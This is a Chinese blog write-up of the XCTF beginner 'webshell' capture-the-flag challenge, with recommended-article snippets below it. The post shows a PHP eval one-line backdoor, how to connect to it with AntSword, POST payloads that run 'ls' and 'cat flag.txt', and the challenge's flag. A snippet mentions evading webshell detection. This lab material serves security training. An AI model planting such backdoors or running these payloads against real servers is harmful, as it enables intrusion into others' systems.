XCTF (新手练习) Wed 之 webshell

最新推荐文章于 2022-05-06 14:24:02 发布
最新推荐文章于 2022-05-06 14:24:02 发布
阅读量517 收藏 1
点赞数 1
分类专栏: XCTF 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43230425/article/details/108737063
版权
本文介绍两种利用WebShell解决网络安全挑战的方法。一种使用中国蚁剑工具,另一种则通过火狐浏览器的Hackbar插件进行。文章详细阐述了每一步操作流程及所需注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

webshell

本题讲解两种办法:

第一种

题目如下图:
附上题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070&page=1
在这里插入图片描述 在这里插入图片描述

  这道题主要在于解题工具的准备,解题步骤很简单。工具可以用中国菜刀或者中国蚁剑,但是中国菜刀很容易下载到开有后门的恶意软件,故我用的是中国蚁剑。
(下载链接:中国蚁剑下载和使用说明
工具准备好之后,以下为解题步骤:
第一步:
打开蚁剑后直接在空白处右键点击“添加数据”
在这里插入图片描述出现这样的界面:
在这里插入图片描述
第二步:
添加URL地址即为:http://220.249.52.133:32109/
还要填写连接密码,根据题目的场景中提示的

<?php @eval($_POST['shell']);?>

试着填写“shell”,之后点击界面左上角的“添加”,出现:
在这里插入图片描述第三步:
在这里插入图片描述出现flag文件,打开即出现结果
在这里插入图片描述在这里插入图片描述

第二种

本方法更加简单,需要的工具是火狐浏览器中的插件“Hackbar”
添加插件方法可参考:https://jingyan.baidu.com/article/375c8e1984a71d64f3a22979.html

第一步:
用火狐浏览器打开题目场景,再打开添加好的“Hackbar”插件,界面如下
在这里插入图片描述第二步:
勾选Hackbar插件中的“Enable Post data”,然后构造如下POST请求来查看目录:

shell=system(‘ls’);

在这里插入图片描述

点击“Run”之后出现flag.txt文件
在这里插入图片描述

第三步:
构造如下POST请求来查看flag文件:

shell=system(‘cat flag.txt’);

在这里插入图片描述

点击“Run”之后出现结果

cyberpeace{1671cb9cdad6e8fd7d0f0d557ae3d215}

在这里插入图片描述

XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
xctf-webshell
rrorb的博客
01-12 398
打开网页界面如下: 百度一下什么是webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取...
xctfwebshell
recordliu的博客
01-28 413
这里一句话木马已经上传了 我们选择用菜刀来访问,菜刀可以去ctf工具下载。 右键,添加,然后把地址输入进去,类型选择php,添加 然后双击进入添加的,查看文件有flag,选择双击, flag出现, ...
11.XCTF webshell
山兔的博客
09-16 355
小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 一打开网站,就看到 你会使用webshell吗? <?php @eval($_POST['shell']);?> 这不就是一句话连接吗, http://111.200.241.244:62328/index.php 连接成功,获得flag。 ...
【攻防世界】web新手练习010 webshell
weixin_43545225的博客
09-12 632
【攻防世界】web新手练习010 webshell 难度系数:2 题目描述: 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 题目场景: http://111.200.241.244:63533/ 解题思路 遇见web题目,习惯性F12看一下控制台。 嗯,毫无线索。 题目提示“ webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一
XCTF-RE】新手练习区-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
做渗透的,不支持恶意攻击
XCTF WEB webshell
无限迭代中......
06-30 1725
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
XCTF Web 新手区010: webshell
立志成为最会敲代码的dancer,最会locking的程序猿
04-01 687
题目: WP: 观察一下页面,一句话内容,密码为shell 直接用中国菜刀跑一下 打开flag.txt文件 成功
XCTF-WEB
qq_43661408的博客
06-22 543
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
XCTF 攻防世界】WEB 新手练习webshell
weixin_45844670的博客
08-09 910
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 首先,我们需要知道什么是webshell webshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。 Webshell可以上传到Web服务器,以允许远程访问Web服务器,例如Web服务器的文件系统。 Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器
XCTF攻防世界web新手练习_ 8_webshell
silence1_的博客
04-29 1万+
XCTF攻防世界web新手练习webshell 题目 题目为webshell,描述中,重点:把它放在了index.php里 打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀,添加,输入url,输如密码,连接成功, 一气呵成! 菜刀连接成功后可以直接对服务器文件进行操作,看到flag.txt,打开获得flag! ...
攻防世界_web新手webshell题解wp——蚁剑解法
weixin_52653109的博客
12-15 605
一句话木马,结构如图 进入环境,发现是个小马。 上蚁剑 第一种解法,右键再虚拟终端 然后在终端用ls查看文件,再用cat打开 第二种方法 右键打开文件管理 找到flag文件,再打开就好了。 ...
XCTF攻防世界web新手练习_ 7_weak_auth
热门推荐
silence1_的博客
04-28 2万+
XCTF攻防世界web新手练习—weak_auth 题目 题目为weak_auth,描述信息,重点:随手就设了一个密码 进入题目,看到需要登录,随便输入一个用户名和密码试试 弹出弹窗提示用admin账户登录 于是用确定用户名为admin F12看看源码,提示需要一个字典,意思是要进行爆破 于是用burp进行爆破,当密码为123456时返回长度不同 查看此时返回响应得到flag! 关于弱...
冰蝎webshell免杀(技巧)
hackzkaq的博客
05-06 2414
零基础学黑客,搜索公众号:白帽子左一 前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎的webhsell时,发现冰蝎的马子居然被杀了…于是便有了该文章… 先说一下目前的免杀情况: D盾,河马等都零警报, vt全绿, 阿里云webshell查杀安全, 百度webshell查杀安全, 其他等等… 目前仅测试了这些…其他的自行测试。 文章开始: 首先看一下冰蝎的原版马子: <?php @error_reporting(0); session_star
xctf web新手easyphp
最新发布
03-24
### XCTF Web EasyPHP 新手教程 解题思路 在处理XCTF竞赛中的Web类题目时,尤其是涉及`EasyPHP`的新手教程或解题思路,可以从以下几个方面入手: #### 一、理解PHP代码审计基础 PHP代码审计的核心在于发现潜在的安全漏洞。常见的安全问题包括SQL注入、命令执行、文件包含等。对于PHP版本为7.4.28的情况,需特别关注该版本特有的行为和修复的已知漏洞[^1]。 #### 二、利用PHP伪协议绕过过滤机制 PHP支持多种伪协议(如`php://input`, `php://filter`, 和 `data://`),这些可以被用来测试输入验证逻辑是否存在缺陷。例如,在某些情况下,攻击者可以通过`php://filter`实现数据流过滤器链的功能,从而达到读取敏感文件的目的[^2]。 以下是尝试通过`php://filter`读取文件的一个简单示例: ```php <?php $file = 'php://filter/read=convert.base64-encode/resource=config.php'; echo file_get_contents($file); ?> ``` 此脚本会将`config.php`的内容以Base64编码的形式输出到屏幕上。如果目标应用未正确校验传入路径,则可能允许上述操作成功执行。 #### 三、常见易受攻击点分析 针对初学者级别的挑战赛题型设计通常较为直观明了,主要考察参赛选手对基本概念的理解程度。下面列举几个典型的切入点及其对应的防护措施建议: 1. **本地文件包含(LFI)** 如果程序存在可控变量直接拼接到include语句中而未经严格过滤的话,就有可能引发LFI风险。 2. **跨站请求伪造(CSRF)** 当用户的浏览器自动发送认证信息给服务器端的时候,如果没有额外的身份确认步骤,恶意网站就可以冒充合法用户提交表单或者点击链接完成非法动作。 3. **弱密码存储方式** 使用哈希算法加盐的方式代替简单的MD5加密方法能够有效提升账户安全性。 以上每种情况都需要仔细审查源码并采取适当手段加以防范。 #### 四、总结 通过对PHP特性的深入理解和实际案例的研究学习,可以帮助我们更好地应对像XCTF这样的网络安全比赛中的web渗透环节。记住不仅要掌握理论知识还要勤于实践不断积累经验教训才能逐步提高自己的技术水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值